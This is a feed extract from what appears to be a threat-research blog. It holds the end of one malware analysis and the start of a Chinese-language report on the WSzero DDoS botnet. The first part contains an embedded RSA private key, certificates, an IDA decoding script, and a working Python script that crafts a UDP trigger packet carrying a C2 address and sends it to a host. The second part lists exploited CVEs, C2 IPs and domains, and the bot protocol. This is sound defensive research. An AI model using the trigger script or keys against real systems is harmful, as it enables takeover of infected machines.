o17UAqhsNGpVu/l8FM3qCHJE7z+wBqHdwVIZMt9vLaLti2KyJV+j1F1GTk8X2jcI
4DnnVKJE81rSafzaX2JBc6J6hovFMMP9IGb2LwRQMZNtZqSus6JMolhkO0dtvxXK
yTm1k79HL3PlZdgKt6HJFoukwkWND8NNTbcBXDWWDdJ42g/1I0Z7tMkdKFgfjUut
90LXKRRuENcUrbi75L6P2FRwPnqvVv+3N25MZQIDAQABAoIBADtguG57kc8bWQdO
NljqPVLshXQyuop1Lh7b+gcuREffdVmnf745ne9eNDn8AC86m6uSV0siOUY21qCG
aRNWigsohSeMnB5lgGaLqXrxnI1P0RogYncT18ExSgtue41Jnoe/8mPhg6yAuuiE
49uVYHkyn5iwlc7b88hTcVvBuO6S7HPqqXbDEBSoKL0o60/FyPb0RKigprKooTo/
KVCRFDT6xpAGMnjZkSSBJB2cgRxQwkcyghMcLJBvsZXbYNihiXiiiwaLvk4ZeBtf
0hnb6Cty840juAIGKDiUELijd3JtVKaBy41KLrdsnC+8JU3RIVGPtPDbwGanvnCk
Ito7gqUCgYEA+MucFy8fcFJtUnOmZ1Uk3AitLua+IrIEp26IHgGaMKFA0hnGEGvb
ZmwkrFj57bGSwsWq7ZSBk8yHRP3HSjJLZZQIcnnTCQxHMXa+YvpuEKE5mQSMwnlu
YH9S2S0xQPi1yLQKjAVVt+zRuuJvMv0dOZAOfdib+3xesPv2fIBu0McCgYEA8D4/
zygeF5k4Omh0l235e08lkqLtqVLu23vJ0TVnP2LNh4rRu6viBuRW7O9tsFLng8L8
aIohdVdF/E2FnNBhnvoohs8+IeFXlD8ml4LC+QD6AcvcMGYYwLIzewODJ2d0ZbBI
hQthoAw9urezc2CLy0da7H9Jmeg26utwZJB4ZXMCgYEAyV9b/rPoeWxuCd+Ln3Wd
+O6Y5i5jVQfLlo1zZP4dBCFwqt2rn5z9H0CGymzWFhq1VCrT96pM2wkfr6rNBHQC
7LvNvoJ2WotykEmxPcG/Fny4du7k03+f5EEKGLhodlMYJ9P5+W1T/SOUefRO1vFi
FzZPVHLfhcUbi5rU3d7CUv8CgYBG82tu578zYvnbLhw42K7UfwRusRWVazvFsGJj
Ge17J9fhTtswHMwtEuSlJvTzHRjorf5TdW/6MqMlp1Ntg5FBHUo4vh3wbZeq3Zet
KV4hoesz+pv140EuL7LKgrgKPCCBI7XXLQxQ8yyL51LlIT9H8rPkopb/EDif2paf
7JbSBwKBgCY8+aO44uuR2dQm0SIUqnb0MigLRs1qcWIfDfHF9K116sGwSK4SD9vD
poCA53ffcrTi+syPiUuBJFZG7VGfWiNJ6GWs48sP5dgyBQaVq5hQofKqQAZAQ0f+
7TxBhBF4n2gc5AhJ3fQAOXZg5rgNqhAln04UAIlgQKO69fAvfzID
-----END RSA PRIVATE KEY-----

</code></pre>
<h2 id="botcertificate">BOT Certificate</h2>
<pre><code>-----BEGIN CERTIFICATE-----
MIIFJTCCBA2gAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBzjELMAkGA1UEBhMCWkEx
FTATBgNVBAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYD
VQQKDBRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlv
biBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2Vy
dmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29t
MB4XDTIyMTAwNzE5NTAwN1oXDTIzMDMxNjE5NTAwN1owgYExCzAJBgNVBAYTAlJV
MR0wGwYDVQQKDBRLYXNwZXJza3kgTGFib3JhdG9yeTEUMBIGA1UEAwwLRW5naW5l
ZXJpbmcxDjAMBgNVBAMMBXhkcjMzMQ8wDQYDVQQIDAZNb3Njb3cxDzANBgNVBAcM
Bk1vc2NvdzELMAkGA1UECwwCSVQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQDpe2Go+NTdcW7z/g8xVDiKoluV5eZeFtVYw+Fj+xOd0Rw7m9CYgw0lzWYh
JlM0/N11dKuPSH0Yl7SLHQIhkgPdsfJkcuKpv97DKUWapI5WS+Ib8l6jXtQCqGw0
alW7+XwUzeoIckTvP7AGod3BUhky328tou2LYrIlX6PUXUZOTxfaNwjgOedUokTz
WtJp/NpfYkFzonqGi8Uww/0gZvYvBFAxk21mpK6zokyiWGQ7R22/FcrJObWTv0cv
c+Vl2Aq3ockWi6TCRY0Pw01NtwFcNZYN0njaD/UjRnu0yR0oWB+NS633QtcpFG4Q
1xStuLvkvo/YVHA+eq9W/7c3bkxlAgMBAAGjggFXMIIBUzAMBgNVHRMBAf8EAjAA
MB0GA1UdDgQWBBRc0LAOwW4C6azovupkjX8R3V+NpjCB+wYDVR0jBIHzMIHwgBTz
BcGhW/F2gdgt/v0oYQtatP2x5aGB1KSB0TCBzjELMAkGA1UEBhMCWkExFTATBgNV
BAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYDVQQKDBRU
aGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlvbiBTZXJ2
aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2VydmVyIENB
MSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29tggEAMA4G
A1UdDwEB/wQEAwIF4DAWBgNVHSUBAf8EDDAKBggrBgEFBQcDAjANBgkqhkiG9w0B
AQsFAAOCAQEAGUPMGTtzrQetSs+w12qgyHETYp8EKKk+yh4AJSC5A4UCKbJLrsUy
qend0E3plARHozy4ruII0XBh5z3MqMnsXcxkC3YJkjX2b2EuYgyhvvIFm326s48P
o6MUSYs5CFxhhp/N0cqmqGgZL5V5evI7P8NpPcFhs7u1ryGDcK1MTtSSPNPy3F+c
d707iRXiRcLQmXQTcjmOVKrohA/kqqtdM5EUl75n9OLTinZcb/CQ9At+5Sn91AI3
ngd22cyLLC3O4F14L+hqwMd0ENSjanX38iZ2EY8hMpmNYwPOVSQZ1FpXqrkW1ArI
lHEtKB3YMeSXQHAsvBQD0AlW7R7JqHdreg==
-----END CERTIFICATE-----

</code></pre>
<h2 id="cacertificate">CA Certificate</h2>
<pre><code>-----BEGIN CERTIFICATE-----
MIIFXTCCBEWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBzjELMAkGA1UEBhMCWkEx
FTATBgNVBAgMDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBwwJQ2FwZSBUb3duMR0wGwYD
VQQKDBRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UECwwfQ2VydGlmaWNhdGlv
biBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAwwYVGhhd3RlIFByZW1pdW0gU2Vy
dmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNlcnZlckB0aGF3dGUuY29t
MB4XDTIyMTAwNzE0MTEzOFoXDTQ3MTAwMTE0MTEzOFowgc4xCzAJBgNVBAYTAlpB
MRUwEwYDVQQIDAxXZXN0ZXJuIENhcGUxEjAQBgNVBAcMCUNhcGUgVG93bjEdMBsG
A1UECgwUVGhhd3RlIENvbnN1bHRpbmcgY2MxKDAmBgNVBAsMH0NlcnRpZmljYXRp
b24gU2VydmljZXMgRGl2aXNpb24xITAfBgNVBAMMGFRoYXd0ZSBQcmVtaXVtIFNl
cnZlciBDQTEoMCYGCSqGSIb3DQEJARYZcHJlbWl1bS1zZXJ2ZXJAdGhhd3RlLmNv
bTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMfHJIl4/Xdo896Rlyqr
3VcKnLAAqIJkpgl90Z6bxUDpwa41H3ZDa7As4ZO9xa+lXGn9XB9u34TqJPkyhSKg
3wYK02KTCwVMI/gf506KpFvocTHpScnXs0xUoxsM8qEiDV2pTe447rmyaLyWcT5d
hbzkPl0WuDmEWMhfC2R9z4+mlsbwMAy9PN/JYzxz7cR48qj4j9hhEwkJ1+yJKXBV
AV9CdgLYfJXrA7A4Hxgc0ECKJmpovskv/DlxM8RxOsHfVtyG4ZgqmRraxUelirlf
tLj0fIkLaP7xvo1QSgiqQffbBOiDg9PN3H2wezFOmeDg9RIR6qvhzhyNpZjANiiC
JzMCAwEAAaOCAUIwggE+MA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPMFwaFb
8XaB2C3+/ShhC1q0/bHlMIH7BgNVHSMEgfMwgfCAFPMFwaFb8XaB2C3+/ShhC1q0
/bHloYHUpIHRMIHOMQswCQYDVQQGEwJaQTEVMBMGA1UECAwMV2VzdGVybiBDYXBl
MRIwEAYDVQQHDAlDYXBlIFRvd24xHTAbBgNVBAoMFFRoYXd0ZSBDb25zdWx0aW5n
IGNjMSgwJgYDVQQLDB9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSEw
HwYDVQQDDBhUaGF3dGUgUHJlbWl1bSBTZXJ2ZXIgQ0ExKDAmBgkqhkiG9w0BCQEW
GXByZW1pdW0tc2VydmVyQHRoYXd0ZS5jb22CAQAwDgYDVR0PAQH/BAQDAgGGMA0G
CSqGSIb3DQEBCwUAA4IBAQDBqNA1WFp15AM8l7oDgqa/YHvoGmfcs48Ak8YtrDEF
tLRyz1+hr/hhfR8Hm1hZ0oj1vAzayhCGKdQTk42mq90dG4tViNYMq4mFKmOoVnw6
u4C8BCPfxmuyNFdw9TVqTjdwWqWM84VMg3Cq3ZrEa94DMOAXm3QXcDsar7SQn5Xw
LCsU7xKJc6gwk4eNWEGxFJwS0EwPhBkt1lH4OD11jH0Ukr5rRJvh1blUiOHPd3//
kzeXNozA9PwoH4wewqk8bXZhj5ZA9LR7rm+5OrCoWXofgn1Gi2yd+LWWCrE7NBWm
yRelxOSPRSQ1fvAVvuRrCnCJgKxG/2Ba2DLs95u6IxYX
-----END CERTIFICATE-----

</code></pre>
<h1 id>&#x9644;&#x5F55;</h1>
<h2 id="0x1decode_res">0x1 Decode_RES</h2>
<pre><code>import idautils
import ida_bytes

def decode(addr,len):
    tmp=bytearray()
    
    buf=ida_bytes.get_bytes(addr,len)
    for i in buf:
        tmp.append(~i&amp;0xff)

    print(&quot;%x, %s&quot; %(addr,bytes(tmp)))
    ida_bytes.put_bytes(addr,bytes(tmp))
    idc.create_strlit(addr,addr+len)
    
calllist=idautils.CodeRefsTo(0x0804F1D8,1)
for addr in calllist:
    prev1Head=idc.prev_head(addr)
    if &apos;push    offset&apos; in idc.generate_disasm_line(prev1Head,1) and idc.get_operand_type(prev1Head,0)==5:
        bufaddr=idc.get_operand_value(prev1Head,0)
        prev2Head=idc.prev_head(prev1Head)
        
        if &apos;push&apos; in idc.generate_disasm_line(prev2Head,1) and idc.get_operand_type(prev2Head,0)==5:
            leng=idc.get_operand_value(prev2Head,0)
            decode(bufaddr,leng)

</code></pre>
<h2 id="0x02gentrigger">0x02 GenTrigger</h2>
<pre><code>import random
import socket


def crc16(data: bytearray, offset, length):
  if data is None or offset &lt; 0 or offset &gt; len(data) - 1 and offset + length &gt; len(data):
    return 0
  crc = 0xFFFF
  for i in range(0, length):
    crc ^= data[offset + i] &lt;&lt; 8
    for j in range(0, 8):
      if (crc &amp; 0x8000) &gt; 0:
        crc = (crc &lt;&lt; 1) ^ 0x1021
      else:
        crc = crc &lt;&lt; 1
  return crc &amp; 0xFFFF

def Gen_payload(ip:str,port:int):
    out=bytearray()
    part1=random.randbytes(92)
    sum=crc16(part1,8,84)
  
    offset1=sum % 0xc8
    offset2=sum % 0x37
    padding1=random.randbytes(offset1)
    padding2=random.randbytes(8)
    
    
    host=socket.inet_aton(ip)
    C2=bytearray(b&apos;\x01&apos;)
    C2+=host
    C2+=int.to_bytes(port,2,byteorder=&quot;big&quot;)
    key=b&apos;NetlabPatched,Enjoy!&apos;
    C2 = C2+key +b&apos;\x00\x00&apos;
    c2sum=crc16(C2,0,29)
    C2=C2[:-2]
    C2+=(int.to_bytes(c2sum,2,byteorder=&quot;big&quot;))

    flag=0x7f*10
    out+=part1
    out+=padding1
    out+=(int.to_bytes(sum,2,byteorder=&quot;big&quot;))
    out+=(int.to_bytes(flag,2,byteorder=&quot;big&quot;))
    out+=padding2

    tmp=bytearray()
    for i in range(29):
      tmp.append(C2[i] ^ out[offset2+8+i])
    out+=tmp

    leng=472-len(out)
    lengpadding=random.randbytes(random.randint(0,leng+1))
    out+=lengpadding

    return out
    
payload=Gen_payload(&apos;192.168.159.128&apos;,6666)
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.sendto(payload,(&quot;192.168.159.133&quot;,2345))  # &#x4EFB;&#x610F;&#x7AEF;&#x53E3;

</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[快讯：使用21个漏洞传播的DDoS家族WSzero已经发展到第4个版本]]></title><description><![CDATA[<!--kg-card-begin: markdown--><h2 id>&#x6982;&#x8FF0;</h2>
<p>&#x8FD1;&#x671F;&#xFF0C;&#x6211;&#x4EEC;&#x7684;BotMon&#x7CFB;&#x7EDF;&#x8FDE;&#x7EED;&#x6355;&#x83B7;&#x5230;&#x4E00;&#x4E2A;&#x7531;Go&#x7F16;&#x5199;&#x7684;DDoS&#x7C7B;&#x578B;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#xFF0C;&#x5B83;&#x7528;&#x4E8E;DDoS&#x653B;&#x51FB;&#xFF0C;&#x4F7F;&#x7528;&#x4E86;&#x5305;&#x62EC;SSH/Telnet&#x5F31;&#x53E3;</p>]]></description><link>https://blog.netlab.360.com/new-ddos-botnet-wszeor/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53029</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[Hui Wang]]></dc:creator><pubDate>Wed, 07 Dec 2022 12:58:21 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><h2 id>&#x6982;&#x8FF0;</h2>
<p>&#x8FD1;&#x671F;&#xFF0C;&#x6211;&#x4EEC;&#x7684;BotMon&#x7CFB;&#x7EDF;&#x8FDE;&#x7EED;&#x6355;&#x83B7;&#x5230;&#x4E00;&#x4E2A;&#x7531;Go&#x7F16;&#x5199;&#x7684;DDoS&#x7C7B;&#x578B;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#xFF0C;&#x5B83;&#x7528;&#x4E8E;DDoS&#x653B;&#x51FB;&#xFF0C;&#x4F7F;&#x7528;&#x4E86;&#x5305;&#x62EC;SSH/Telnet&#x5F31;&#x53E3;&#x4EE4;&#x5728;&#x5185;&#x7684;&#x591A;&#x8FBE;22&#x79CD;&#x4F20;&#x64AD;&#x65B9;&#x5F0F;&#x3002;&#x77ED;&#x65F6;&#x95F4;&#x5185;&#x51FA;&#x73B0;&#x4E86;4&#x4E2A;&#x4E0D;&#x540C;&#x7684;&#x7248;&#x672C;&#xFF0C;&#x6709;&#x9274;&#x4E8E;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x89C9;&#x5F97;&#x8BE5;&#x5BB6;&#x65CF;&#x672A;&#x6765;&#x5F88;&#x53EF;&#x80FD;&#x7EE7;&#x7EED;&#x6D3B;&#x8DC3;&#xFF0C;&#x503C;&#x5F97;&#x8B66;&#x60D5;&#x3002;&#x4E0B;&#x9762;&#x4ECE;&#x4F20;&#x64AD;&#x3001;&#x6837;&#x672C;&#x548C;&#x8DDF;&#x8E2A;&#x89D2;&#x5EA6;&#x5206;&#x522B;&#x4ECB;&#x7ECD;&#x3002;</p>
<h2 id>&#x4F20;&#x64AD;&#x5206;&#x6790;</h2>
<p>&#x9664;&#x4E86;Telnet/SSH&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x6211;&#x4EEC;&#x89C2;&#x5BDF;&#x5230;wszero&#x8FD8;&#x4F7F;&#x7528;&#x4E86;&#x5982;&#x4E0B;<code>21</code>&#x4E2A;&#x6F0F;&#x6D1E;&#x8FDB;&#x884C;&#x4F20;&#x64AD;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>VULNERABILITY</th>
<th>AFFECTED</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-8361?ref=blog.netlab.360.com">CVE_2014_08361</a></td>
<td>Realtek SDK</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-17106?ref=blog.netlab.360.com">CVE_2017_17106</a></td>
<td>Zivif Webcams</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/cve-2017-17215?ref=blog.netlab.360.com">CVE_2017_17215</a></td>
<td>Huawei HG532</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-12613?ref=blog.netlab.360.com">CVE_2018_12613</a></td>
<td>phpMyAdmin 4.8.x before 4.8.2</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-10987?ref=blog.netlab.360.com">CVE_2020_10987</a></td>
<td>Tenda AC15 AC1900</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-25506?ref=blog.netlab.360.com">CVE_2020_25506</a></td>
<td>D-Link DNS-320 FW v2.06B01 Revision Ax</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-35395?ref=blog.netlab.360.com">CVE_2021_35395</a></td>
<td>Realtek Jungle SDK</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/164603/hikvision210702-exec.txt?ref=blog.netlab.360.com">CVE_2021_36260</a></td>
<td>Hikvision DVR</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html?ref=blog.netlab.360.com">CVE_2021_46422</a></td>
<td>Telesquare SDT CW3B1</td>
</tr>
<tr>
<td><a href="https://www.itechpost.com/articles/110537/20220509/f5-big-ip-trouble-cve-2022-1388-vulnerability-%E2%80%94-patch.htm?ref=blog.netlab.360.com">CVE_2022_01388</a></td>
<td>F5 BIG-IP</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/cve-2022-22965?ref=blog.netlab.360.com">CVE_2022_22965</a></td>
<td>Spring</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/cve-2022-25075?ref=blog.netlab.360.com">CVE_2022_25075</a></td>
<td>TOTOLINK A3000RU</td>
</tr>
<tr>
<td><a href="https://doudoudedi.github.io/2022/02/21/TOTOLINK-N600R-Command-Injection/?ref=blog.netlab.360.com">CVE_2022_26186</a></td>
<td>TOTOLINK N600R</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-26210?ref=blog.netlab.360.com">CVE_2022_26210</a></td>
<td>TOTOLINK A830R</td>
</tr>
<tr>
<td><a href="https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/?ref=blog.netlab.360.com">CVE_2022_30525</a></td>
<td>Zyxel Firewall</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-34538?ref=blog.netlab.360.com">CVE_2022_34538</a></td>
<td>Digital Watchdog DW MEGApix IP cameras</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/cve/CVE-2022-37061?ref=blog.netlab.360.com">CVE_2022_37061</a></td>
<td>FLIR AX8 thermal sensor cameras</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/44760?ref=blog.netlab.360.com">DLINK</a></td>
<td>D-Link DSL-2750B</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/cve-2018-10561?ref=blog.netlab.360.com">CVE-2018-10561</a></td>
<td>Dasan GPON home router</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/47031?ref=blog.netlab.360.com">SAPIDO RB-1732 command line execution</a></td>
<td>SAPIDO RB-1732</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html?ref=blog.netlab.360.com">PHP Backdoor</a></td>
<td>PHP 8.1.0 dev Backdoor</td>
</tr>
</tbody>
</table>
<h2 id>&#x6837;&#x672C;&#x5206;&#x6790;</h2>
<p>&#x7B80;&#x5355;&#x6765;&#x8BF4;&#xFF0C;wszero&#x662F;&#x4E00;&#x4E2A;Go&#x8BED;&#x8A00;&#x7F16;&#x5199;&#x7684;DDoS&#x7C7B;&#x578B;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#xFF0C;&#x5B83;&#x88AB;&#x547D;&#x540D;&#x4E3A;wszero&#x7684;&#x539F;&#x56E0;&#x662F;&#x5B83;&#x7684;&#x4E0B;&#x8F7D;&#x94FE;&#x63A5;&#x4E2D;&#x7684;&#x6587;&#x4EF6;&#x540D;&#x591A;&#x4E3A;<code>zero.*</code>&#x8FD9;&#x79CD;&#x5F62;&#x5F0F;&#xFF0C;&#x5E76;&#x4E14;&#x6700;&#x65B0;&#x7248;&#x672C;C2&#x534F;&#x8BAE;&#x57FA;&#x4E8E;<code>websocket</code>&#xFF0C;&#x6240;&#x4EE5;&#x5C06;&#x5176;&#x7F29;&#x5199;&#x4E3A;<code>wszero</code>&#x3002;&#x57FA;&#x4E8E;&#x6837;&#x672C;&#x7684;C2&#x534F;&#x8BAE;&#x3001;&#x4E3B;&#x673A;&#x884C;&#x4E3A;&#x548C;C2&#x52A0;&#x5BC6;&#x7B49;&#x65B9;&#x9762;&#x7279;&#x5F81;&#xFF0C;&#x6211;&#x4EEC;&#x628A;&#x5DF2;&#x7ECF;&#x6355;&#x83B7;&#x7684;wszero&#x5206;&#x4E3A;4&#x4E2A;&#x5927;&#x7684;&#x7248;&#x672C;&#xFF0C;&#x5176;&#x6355;&#x83B7;&#x7684;&#x65F6;&#x95F4;&#x7EBF;&#x5982;&#x4E0B;&#xFF1A;</p>
<ul>
<li>2022&#x5E74;11&#x6708;18&#x65E5;&#xFF0C;&#x9996;&#x6B21;&#x6355;&#x83B7;&#x5230;wszero v1</li>
<li>2022&#x5E74;11&#x6708;21&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x5230;V2&#x6837;&#x672C;</li>
<li>2022&#x5E74;11&#x6708;24&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x5230;V3&#x6837;&#x672C;</li>
<li>2022&#x5E74;11&#x6708;26&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x5230;V3.x&#x6837;&#x672C;</li>
<li>2022&#x5E74;11&#x6708;29&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x5230;V4&#x6837;&#x672C;</li>
</ul>
<p>&#x4E0B;&#x9762;&#x662F;&#x8FD9;4&#x4E2A;&#x7248;&#x672C;&#x4E00;&#x4E9B;&#x5177;&#x4F53;&#x7279;&#x6027;&#x7684;&#x5BF9;&#x6BD4;:</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>C2</th>
<th>Decryption</th>
<th>Exploit</th>
<th>Tel/SSH Crack</th>
<th>Protocol</th>
<th>Platform</th>
<th>Persistence</th>
<th>Instruction</th>
</tr>
</thead>
<tbody>
<tr>
<td>v1</td>
<td>176.65.137.5:1401</td>
<td>SUB1</td>
<td>0</td>
<td>No</td>
<td>TCP</td>
<td>Linux</td>
<td>YES</td>
<td>print,attack,command</td>
</tr>
<tr>
<td>v2</td>
<td>176.65.137.5:80</td>
<td>NO</td>
<td>0</td>
<td>No</td>
<td>WS</td>
<td>Linux</td>
<td>YES</td>
<td>print,attack,command</td>
</tr>
<tr>
<td>v3</td>
<td>zero.sudolite.ml</td>
<td>SUB 1</td>
<td>0</td>
<td>No</td>
<td>WSS</td>
<td>Linux</td>
<td>YES</td>
<td>print,attack,command</td>
</tr>
<tr>
<td>v3.x</td>
<td>zero.sudolite.ml</td>
<td>SUB1</td>
<td>21</td>
<td>YES</td>
<td>WSS</td>
<td>Linux/Windows</td>
<td>YES</td>
<td>kill,attack,update,ping,stop,command,enable_scan,disable_scan</td>
</tr>
<tr>
<td>v4</td>
<td>176.65.137.5:80</td>
<td>SUB1</td>
<td>21</td>
<td>YES</td>
<td>WS</td>
<td>Linux/Windows</td>
<td>YES</td>
<td>kill,attack,update,ping,stop,command,enable_scan,disable_scan</td>
</tr>
</tbody>
</table>
<p>&#x56E0;&#x4E3A;&#x4F7F;&#x7528;Go&#x7F16;&#x5199;&#x5E76;&#x4E14;&#x672A;&#x4F5C;&#x6DF7;&#x6DC6;&#xFF0C;&#x4ECE;wszero&#x6837;&#x672C;&#x4E2D;&#x80FD;&#x5BB9;&#x6613;&#x7684;&#x6062;&#x590D;&#x51FA;&#x51FD;&#x6570;&#x7B26;&#x53F7;&#x548C;&#x529F;&#x80FD;&#x903B;&#x8F91;&#x7B49;&#xFF0C;&#x56E0;&#x6B64;&#x6211;&#x4EEC;&#x4E0D;&#x505A;&#x8BE6;&#x7EC6;&#x7684;&#x6837;&#x672C;&#x5206;&#x6790;&#xFF0C;&#x4E0B;&#x9762;&#x7740;&#x91CD;&#x4ECB;&#x7ECD;&#x4E0B;wszero&#x7684;C2&#x5B58;&#x50A8;&#x548C;&#x901A;&#x4FE1;&#x3002;</p>
<h3 id="c2">C2&#x5B58;&#x50A8;&#x548C;&#x89E3;&#x5BC6;</h3>
<p>V1&#x548C;V3&#x90FD;&#x4F7F;&#x7528;&#x4E86;&#x52A0;&#x5BC6;&#x7684;&#x65B9;&#x5F0F;&#x5B58;&#x50A8;C2&#xFF0C;&#x5176;&#x4E2D;V1&#x7684;C2&#x4FDD;&#x5B58;&#x5728;&#x6837;&#x672C;&#x7684;rodata&#x6BB5;&#x4E2D;&#xFF0C;&#x800C;V3&#x5219;&#x5B58;&#x653E;&#x5728;&#x5C40;&#x90E8;&#x53D8;&#x91CF;&#x4E2D;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/11/wszero_c2.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_c2.png" class="kg-image"></a></p>
<p>&#x5B83;&#x4EEC;&#x7684;&#x89E3;&#x5BC6;&#x65B9;&#x6CD5;&#x76F8;&#x540C;&#xFF0C;&#x90FD;&#x4E3A;<strong>SUB 1</strong>&#x7B97;&#x6CD5;&#xFF0C;&#x5373;&#x9010;&#x5B57;&#x8282;&#x51CF;&#x4E00;&#x3002;&#x4E0A;&#x56FE;&#x4E2D;&#x5C06;V3&#x7684;&#x5C40;&#x90E8;&#x53D8;&#x91CF;&#x62FC;&#x63A5;&#x540E;&#xFF0C;&#x518D;&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#x5C31;&#x5F97;&#x5230;&#x4E86;C2&#x4EE5;&#x53CA;URI&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/11/wszero_v3c2.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_v3c2.png" class="kg-image"></a></p>
<h3 id="c2">C2&#x534F;&#x8BAE;</h3>
<p>Wszero&#x7684;C2&#x6D88;&#x606F;&#x4F7F;&#x7528;&#x4E86;&#x4E00;&#x4E2A;&#x81EA;&#x5B9A;&#x4E49;&#x7684;JSON&#x4E32;&#xFF0C;&#x4E0D;&#x540C;&#x7248;&#x672C;&#x95F4;&#x6709;&#x51E0;&#x4E2A;JSON&#x5B57;&#x6BB5;&#x7684;&#x5FAE;&#x5C0F;&#x5DEE;&#x522B;&#x3002;&#x6700;&#x521D;&#x7248;&#x672C;&#x7684;&#x5E95;&#x5C42;&#x4F20;&#x8F93;&#x534F;&#x8BAE;&#x4F7F;&#x7528;TCP&#xFF0C;&#x540E;&#x7EED;&#x7248;&#x672C;&#x6362;&#x6210;&#x4E86;WEBSOCKET&#xFF0C;&#x4EE5;&#x53CA;TLS&#x4FDD;&#x62A4;&#x7684;WEBSOCKET&#xFF0C;&#x4E0B;&#x9762;&#x5206;&#x522B;&#x4ECB;&#x7ECD;&#x3002;</p>
<h4 id>&#x4E0A;&#x7EBF;&#x5305;&#x683C;&#x5F0F;</h4>
<p>&#x5F53;C2&#x8FDE;&#x63A5;&#x5EFA;&#x7ACB;&#x540E;&#xFF0C;C2&#x4F1A;&#x4E3B;&#x52A8;&#x5411;BOT&#x53D1;&#x9001;Banner&#x4FE1;&#x606F;&#x63D0;&#x793A;&#x8F93;&#x5165;&#x7528;&#x6237;&#x540D;&#xFF0C;BOT&#x9996;&#x5148;&#x5411;C2&#x53D1;&#x9001;&#x786C;&#x7F16;&#x7801;&#x7684;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x63A5;&#x7740;&#x518D;&#x53D1;&#x9001;JSON&#x683C;&#x5F0F;&#x7684;BotInfo&#xFF0C;&#x5F62;&#x5982; <code>{&quot;platform&quot;: &quot;%s&quot;, &quot;gcc&quot;: &quot;%s&quot;, &quot;cpu&quot;: %d, &quot;payload&quot;: &quot;%s&quot;} </code>&#xFF0C;&#x5176;&#x4E2D;payload&#x6307;&#x7684;&#x662F;&#x5206;&#x7EC4;&#x4FE1;&#x606F;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_v1pkg.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_v1pkg.png" class="kg-image"></a></p>
